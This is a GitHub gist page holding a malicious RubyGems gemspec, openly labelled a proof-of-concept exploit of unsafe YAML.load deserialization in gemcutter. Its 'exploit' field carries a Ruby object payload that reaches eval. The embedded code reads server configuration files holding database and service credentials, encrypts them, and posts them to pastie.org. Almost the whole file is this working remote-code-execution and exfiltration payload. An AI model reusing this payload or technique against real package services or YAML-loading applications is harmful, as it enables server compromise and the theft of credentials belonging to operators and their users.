Skip to content

Instantly share code, notes, and snippets.

@titanous
Last active December 11, 2015 23:08
Show Gist options
  • Save titanous/d891e876c53e55bf0920 to your computer and use it in GitHub Desktop.
Save titanous/d891e876c53e55bf0920 to your computer and use it in GitHub Desktop.
# context: https://news.ycombinator.com/item?id=5139720
--- !ruby/object:Gem::Specification
name: exploit
version: !ruby/object:Gem::Version
version: 22.31.31
prerelease:
platform: ruby
authors:
- Hacker
autorequire:
bindir: bin
cert_chain: []
date: 2013-01-30 00:00:00.000000000 Z
dependencies: []
description: ! 'A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych
YAML
parser, which allows the #[]= method to be called on arbitrary Objects.
If the #[]= method later calls eval() with the given arguments, this allows for
arbitrary execution of code.'
email: support@rubygems.org
executables: []
extensions: []
extra_rdoc_files: []
files:
- gemcutter_rce
homepage: http://rubygems.org/
licenses: []
post_install_message:
rdoc_options: []
require_paths:
- lib
required_ruby_version: !ruby/object:Gem::Requirement
none: false
requirements:
- - ! '>='
- !ruby/object:Gem::Version
version: '0'
required_rubygems_version: !ruby/object:Gem::Requirement
none: false
requirements:
- - ! '>='
- !ruby/object:Gem::Version
version: '0'
requirements: []
rubyforge_project:
rubygems_version: 1.8.24
signing_key:
specification_version: 3
summary: PoC malicious gem that exploits YAML.load in gemcutter
test_files: []
exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
= proc { |text|\n # sourzed from MetaSploit, best pwning t00l ev4r!\n aes_256
= OpenSSL::Cipher.new('aes-256-cbc')\n aes_256.encrypt\n aes_256.key = Digest::MD5.hexdigest(`uname
-r`)\n\n crypted = aes_256.update(text)\n crypted << aes_256.final\n\n Base64.encode64(crypted)\n}\n\nexfil
= proc { |path|\n if File.file?(path) == true\n \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
\ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
\"config/rubygems.yml\"].map { |path| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
{\n 'paste[authorization]' => 'burger',\n 'paste[access_key]' => '',\n 'paste[parse_id]'
\ => '6',\n 'paste[body]' => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
\ 'paste[restricted]' => '0',\n 'commit' => 'Create Paste'\n})\nend;
@executed = true) unless @executed\n__END__\n"
: !ruby/object:OpenStruct
table:
:defaults:
:action: create
:controller: foos
:required_parts: []
:requirements:
:action: create
:controller: foos
:segment_keys:
- :format
modifiable: true
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment